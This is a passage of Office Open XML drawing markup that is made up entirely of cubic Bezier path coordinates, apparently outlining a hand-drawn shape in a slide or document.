                  <a:pt x="186" y="2"/>
                  <a:pt x="203" y="2"/>
                  <a:pt x="219" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="2"/>
                  <a:pt x="246" y="3"/>
                  <a:pt x="259" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="2"/>
                  <a:pt x="265" y="2"/>
                  <a:pt x="268" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="270" y="2"/>
                  <a:pt x="272" y="0"/>
                  <a:pt x="274" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="280" y="2"/>
                  <a:pt x="286" y="2"/>
                  <a:pt x="291" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="2"/>
                  <a:pt x="293" y="1"/>
                  <a:pt x="294" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="1"/>
                  <a:pt x="294" y="2"/>
                  <a:pt x="295" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="295" y="2"/>
                  <a:pt x="297" y="2"/>
                  <a:pt x="298" y="2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="4"/>
                  <a:pt x="299" y="6"/>
                  <a:pt x="298" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300" y="17"/>
                  <a:pt x="298" y="27"/>
                  <a:pt x="299" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300" y="40"/>
                  <a:pt x="300" y="44"/>
                  <a:pt x="300" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300" y="50"/>
                  <a:pt x="300" y="52"/>
                  <a:pt x="300" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="300" y="55"/>
                  <a:pt x="299" y="56"/>
                  <a:pt x="299" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="59"/>
                  <a:pt x="300" y="60"/>
                  <a:pt x="300" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="66"/>
                  <a:pt x="300" y="69"/>
                  <a:pt x="301" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="81"/>
                  <a:pt x="301" y="88"/>
                  <a:pt x="301" y="95"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="98"/>
                  <a:pt x="301" y="99"/>
                  <a:pt x="301" y="101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="109"/>
                  <a:pt x="301" y="117"/>
                  <a:pt x="301" y="125"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="133"/>
                  <a:pt x="300" y="142"/>
                  <a:pt x="301" y="150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="159"/>
                  <a:pt x="301" y="167"/>
                  <a:pt x="300" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="304" y="177"/>
                  <a:pt x="306" y="175"/>
                  <a:pt x="309" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313" y="177"/>
                  <a:pt x="313" y="183"/>
                  <a:pt x="311" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="309" y="187"/>
                  <a:pt x="308" y="188"/>
                  <a:pt x="307" y="187"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="187"/>
                  <a:pt x="283" y="186"/>
                  <a:pt x="271" y="186"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="190"/>
                  <a:pt x="271" y="194"/>
                  <a:pt x="271" y="197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="272" y="217"/>
                  <a:pt x="274" y="236"/>
                  <a:pt x="274" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="275" y="264"/>
                  <a:pt x="275" y="271"/>
                  <a:pt x="277" y="276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="274" y="280"/>
                  <a:pt x="267" y="280"/>
                  <a:pt x="262" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="260" y="280"/>
                  <a:pt x="256" y="280"/>
                  <a:pt x="255" y="276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255" y="274"/>
                  <a:pt x="256" y="272"/>
                  <a:pt x="256" y="269"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="264"/>
                  <a:pt x="255" y="259"/>
                  <a:pt x="255" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="253" y="254"/>
                  <a:pt x="250" y="255"/>
                  <a:pt x="248" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="247" y="261"/>
                  <a:pt x="246" y="267"/>
                  <a:pt x="245" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="241" y="274"/>
                  <a:pt x="235" y="273"/>
                  <a:pt x="230" y="274"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="274"/>
                  <a:pt x="229" y="273"/>
                  <a:pt x="228" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="227" y="267"/>
                  <a:pt x="231" y="261"/>
                  <a:pt x="231" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="254"/>
                  <a:pt x="199" y="255"/>
                  <a:pt x="185" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="255"/>
                  <a:pt x="136" y="255"/>
                  <a:pt x="108" y="255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="255"/>
                  <a:pt x="83" y="254"/>
                  <a:pt x="71" y="254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="261"/>
                  <a:pt x="69" y="269"/>
                  <a:pt x="69" y="277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="69" y="279"/>
                  <a:pt x="69" y="281"/>
                  <a:pt x="68" y="283"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="282"/>
                  <a:pt x="58" y="281"/>
                  <a:pt x="54" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="52" y="277"/>
                  <a:pt x="49" y="275"/>
                  <a:pt x="47" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="242"/>
                  <a:pt x="53" y="211"/>
                  <a:pt x="57" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="183"/>
                  <a:pt x="38" y="183"/>
                  <a:pt x="30" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="191"/>
                  <a:pt x="28" y="197"/>
                  <a:pt x="27" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="207"/>
                  <a:pt x="26" y="210"/>
                  <a:pt x="26" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="215"/>
                  <a:pt x="26" y="216"/>
                  <a:pt x="26" y="218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="220"/>
                  <a:pt x="25" y="222"/>
                  <a:pt x="25" y="223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="225"/>
                  <a:pt x="25" y="226"/>
                  <a:pt x="25" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="228"/>
                  <a:pt x="25" y="229"/>
                  <a:pt x="24" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="230"/>
                  <a:pt x="25" y="231"/>
                  <a:pt x="24" y="232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="233"/>
                  <a:pt x="24" y="235"/>
                  <a:pt x="23" y="236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="245"/>
                  <a:pt x="21" y="256"/>
                  <a:pt x="20" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="268"/>
                  <a:pt x="21" y="270"/>
                  <a:pt x="20" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="272"/>
                  <a:pt x="14" y="273"/>
                  <a:pt x="11" y="273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="273"/>
                  <a:pt x="4" y="272"/>
                  <a:pt x="2" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="271"/>
                  <a:pt x="3" y="269"/>
                  <a:pt x="2" y="268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="266"/>
                  <a:pt x="3" y="267"/>
                  <a:pt x="3" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="244"/>
                  <a:pt x="8" y="223"/>
                  <a:pt x="10" y="201"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="194"/>
                  <a:pt x="13" y="185"/>
                  <a:pt x="13" y="182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="161"/>
                  <a:pt x="17" y="138"/>
                  <a:pt x="20" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="104"/>
                  <a:pt x="22" y="92"/>
                  <a:pt x="24" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="75"/>
                  <a:pt x="25" y="70"/>
                  <a:pt x="26" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="56"/>
                  <a:pt x="28" y="48"/>
                  <a:pt x="28" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="25"/>
                  <a:pt x="28" y="15"/>
                  <a:pt x="27" y="2"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="30" y="48"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="52"/>
                  <a:pt x="31" y="57"/>
                  <a:pt x="31" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="68"/>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="76"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="78"/>
                  <a:pt x="32" y="79"/>
                  <a:pt x="32" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="88"/>
                  <a:pt x="32" y="95"/>
                  <a:pt x="32" y="101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="105"/>
                  <a:pt x="33" y="110"/>
                  <a:pt x="33" y="114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="115"/>
                  <a:pt x="32" y="115"/>
                  <a:pt x="32" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="121"/>
                  <a:pt x="33" y="128"/>
                  <a:pt x="33" y="131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="133"/>
                  <a:pt x="33" y="136"/>
                  <a:pt x="33" y="139"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="150"/>
                  <a:pt x="34" y="160"/>
                  <a:pt x="34" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="169"/>
                  <a:pt x="39" y="167"/>
                  <a:pt x="42" y="165"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="151"/>
                  <a:pt x="41" y="134"/>
                  <a:pt x="41" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="114"/>
                  <a:pt x="41" y="109"/>
                  <a:pt x="41" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="98"/>
                  <a:pt x="41" y="92"/>
                  <a:pt x="41" y="86"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="79"/>
                  <a:pt x="41" y="73"/>
                  <a:pt x="41" y="67"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="61"/>
                  <a:pt x="40" y="55"/>
                  <a:pt x="40" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="44"/>
                  <a:pt x="40" y="38"/>
                  <a:pt x="39" y="33"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="26"/>
                  <a:pt x="38" y="19"/>
                  <a:pt x="39" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="11"/>
                  <a:pt x="36" y="9"/>
                  <a:pt x="34" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="7"/>
                  <a:pt x="30" y="5"/>
                  <a:pt x="29" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="18"/>
                  <a:pt x="30" y="34"/>
                  <a:pt x="30" y="48"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="308" y="179"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="178"/>
                  <a:pt x="277" y="178"/>
                  <a:pt x="260" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="253" y="178"/>
                  <a:pt x="246" y="177"/>
                  <a:pt x="241" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="238" y="177"/>
                  <a:pt x="236" y="178"/>
                  <a:pt x="233" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="178"/>
                  <a:pt x="231" y="177"/>
                  <a:pt x="230" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="177"/>
                  <a:pt x="228" y="178"/>
                  <a:pt x="228" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="178"/>
                  <a:pt x="210" y="177"/>
                  <a:pt x="202" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201" y="177"/>
                  <a:pt x="200" y="178"/>
                  <a:pt x="199" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="199" y="178"/>
                  <a:pt x="198" y="177"/>
                  <a:pt x="197" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="177"/>
                  <a:pt x="194" y="178"/>
                  <a:pt x="193" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="178"/>
                  <a:pt x="183" y="178"/>
                  <a:pt x="178" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="177"/>
                  <a:pt x="158" y="177"/>
                  <a:pt x="149" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145" y="177"/>
                  <a:pt x="141" y="178"/>
                  <a:pt x="138" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="176"/>
                  <a:pt x="134" y="176"/>
                  <a:pt x="132" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="177"/>
                  <a:pt x="124" y="175"/>
                  <a:pt x="120" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="175"/>
                  <a:pt x="103" y="175"/>
                  <a:pt x="94" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="86" y="176"/>
                  <a:pt x="78" y="175"/>
                  <a:pt x="70" y="175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="176"/>
                  <a:pt x="42" y="176"/>
                  <a:pt x="30" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="175"/>
                  <a:pt x="18" y="174"/>
                  <a:pt x="19" y="178"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="183"/>
                  <a:pt x="25" y="181"/>
                  <a:pt x="28" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="181"/>
                  <a:pt x="37" y="181"/>
                  <a:pt x="41" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="181"/>
                  <a:pt x="45" y="180"/>
                  <a:pt x="47" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="180"/>
                  <a:pt x="51" y="181"/>
                  <a:pt x="52" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="182"/>
                  <a:pt x="69" y="181"/>
                  <a:pt x="77" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="182"/>
                  <a:pt x="90" y="181"/>
                  <a:pt x="96" y="181"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="181"/>
                  <a:pt x="107" y="182"/>
                  <a:pt x="113" y="182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="182"/>
                  <a:pt x="135" y="182"/>
                  <a:pt x="147" y="182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="150" y="182"/>
                  <a:pt x="153" y="183"/>
                  <a:pt x="156" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="183"/>
                  <a:pt x="181" y="182"/>
                  <a:pt x="193" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="183"/>
                  <a:pt x="199" y="183"/>
                  <a:pt x="201" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="183"/>
                  <a:pt x="206" y="184"/>
                  <a:pt x="208" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211" y="184"/>
                  <a:pt x="214" y="184"/>
                  <a:pt x="218" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="184"/>
                  <a:pt x="247" y="184"/>
                  <a:pt x="259" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="263" y="183"/>
                  <a:pt x="267" y="185"/>
                  <a:pt x="270" y="183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="184"/>
                  <a:pt x="272" y="184"/>
                  <a:pt x="274" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="185"/>
                  <a:pt x="295" y="184"/>
                  <a:pt x="307" y="185"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="309" y="184"/>
                  <a:pt x="310" y="180"/>
                  <a:pt x="308" y="179"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="299" y="137"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="110"/>
                  <a:pt x="299" y="83"/>
                  <a:pt x="297" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="39"/>
                  <a:pt x="297" y="23"/>
                  <a:pt x="296" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="8"/>
                  <a:pt x="291" y="12"/>
                  <a:pt x="288" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="291" y="37"/>
                  <a:pt x="290" y="56"/>
                  <a:pt x="291" y="77"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="291" y="81"/>
                  <a:pt x="290" y="85"/>
                  <a:pt x="290" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="290" y="100"/>
                  <a:pt x="291" y="108"/>
                  <a:pt x="291" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="126"/>
                  <a:pt x="291" y="135"/>
                  <a:pt x="291" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="291" y="153"/>
                  <a:pt x="290" y="162"/>
                  <a:pt x="290" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="173"/>
                  <a:pt x="295" y="174"/>
                  <a:pt x="298" y="175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="299" y="164"/>
                  <a:pt x="298" y="151"/>
                  <a:pt x="299" y="137"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="295" y="176"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="175"/>
                  <a:pt x="292" y="174"/>
                  <a:pt x="290" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="174"/>
                  <a:pt x="289" y="174"/>
                  <a:pt x="288" y="174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="287" y="173"/>
                  <a:pt x="287" y="172"/>
                  <a:pt x="286" y="171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="272" y="169"/>
                  <a:pt x="252" y="170"/>
                  <a:pt x="238" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="237" y="170"/>
                  <a:pt x="236" y="169"/>
                  <a:pt x="236" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="235" y="170"/>
                  <a:pt x="234" y="170"/>
                  <a:pt x="233" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="173"/>
                  <a:pt x="231" y="174"/>
                  <a:pt x="229" y="175"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252" y="176"/>
                  <a:pt x="277" y="176"/>
                  <a:pt x="295" y="176"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41" y="10"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="11"/>
                  <a:pt x="42" y="9"/>
                  <a:pt x="43" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="10"/>
                  <a:pt x="44" y="11"/>
                  <a:pt x="45" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="11"/>
                  <a:pt x="47" y="10"/>
                  <a:pt x="48" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="10"/>
                  <a:pt x="51" y="11"/>
                  <a:pt x="52" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="11"/>
                  <a:pt x="54" y="11"/>
                  <a:pt x="55" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="11"/>
                  <a:pt x="101" y="11"/>
                  <a:pt x="124" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="11"/>
                  <a:pt x="127" y="11"/>
                  <a:pt x="128" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="139" y="11"/>
                  <a:pt x="149" y="11"/>
                  <a:pt x="161" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="12"/>
                  <a:pt x="199" y="11"/>
                  <a:pt x="218" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="12"/>
                  <a:pt x="246" y="12"/>
                  <a:pt x="257" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="13"/>
                  <a:pt x="277" y="12"/>
                  <a:pt x="287" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="9"/>
                  <a:pt x="292" y="7"/>
                  <a:pt x="294" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="275" y="3"/>
                  <a:pt x="254" y="5"/>
                  <a:pt x="237" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="4"/>
                  <a:pt x="218" y="4"/>
                  <a:pt x="208" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="4"/>
                  <a:pt x="170" y="3"/>
                  <a:pt x="149" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="3"/>
                  <a:pt x="91" y="3"/>
                  <a:pt x="58" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="3"/>
                  <a:pt x="41" y="2"/>
                  <a:pt x="36" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="4"/>
                  <a:pt x="33" y="4"/>
                  <a:pt x="32" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="6"/>
                  <a:pt x="37" y="9"/>
                  <a:pt x="41" y="10"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="288" y="106"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="97"/>
                  <a:pt x="289" y="88"/>
                  <a:pt x="288" y="79"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="289" y="76"/>
                  <a:pt x="288" y="72"/>
                  <a:pt x="288" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="65"/>
                  <a:pt x="288" y="61"/>
                  <a:pt x="288" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="43"/>
                  <a:pt x="288" y="29"/>
                  <a:pt x="286" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="282" y="14"/>
                  <a:pt x="278" y="14"/>
                  <a:pt x="275" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="271" y="14"/>
                  <a:pt x="267" y="14"/>
                  <a:pt x="264" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="261" y="14"/>
                  <a:pt x="258" y="13"/>
                  <a:pt x="257" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="14"/>
                  <a:pt x="254" y="14"/>
                  <a:pt x="252" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="242" y="13"/>
                  <a:pt x="228" y="14"/>
                  <a:pt x="216" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="205" y="13"/>
                  <a:pt x="194" y="14"/>
                  <a:pt x="185" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="13"/>
                  <a:pt x="161" y="13"/>
                  <a:pt x="149" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="13"/>
                  <a:pt x="138" y="13"/>
                  <a:pt x="133" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="130" y="13"/>
                  <a:pt x="127" y="13"/>
                  <a:pt x="124" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="13"/>
                  <a:pt x="88" y="13"/>
                  <a:pt x="72" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="13"/>
                  <a:pt x="57" y="12"/>
                  <a:pt x="51" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="13"/>
                  <a:pt x="49" y="13"/>
                  <a:pt x="48" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="13"/>
                  <a:pt x="46" y="12"/>
                  <a:pt x="45" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="12"/>
                  <a:pt x="42" y="13"/>
                  <a:pt x="40" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40" y="25"/>
                  <a:pt x="42" y="39"/>
                  <a:pt x="42" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="54"/>
                  <a:pt x="43" y="59"/>
                  <a:pt x="43" y="65"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="73"/>
                  <a:pt x="43" y="81"/>
                  <a:pt x="43" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="98"/>
                  <a:pt x="44" y="107"/>
                  <a:pt x="44" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="122"/>
                  <a:pt x="44" y="130"/>
                  <a:pt x="44" y="138"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="147"/>
                  <a:pt x="45" y="155"/>
                  <a:pt x="44" y="164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="165"/>
                  <a:pt x="110" y="165"/>
                  <a:pt x="140" y="166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
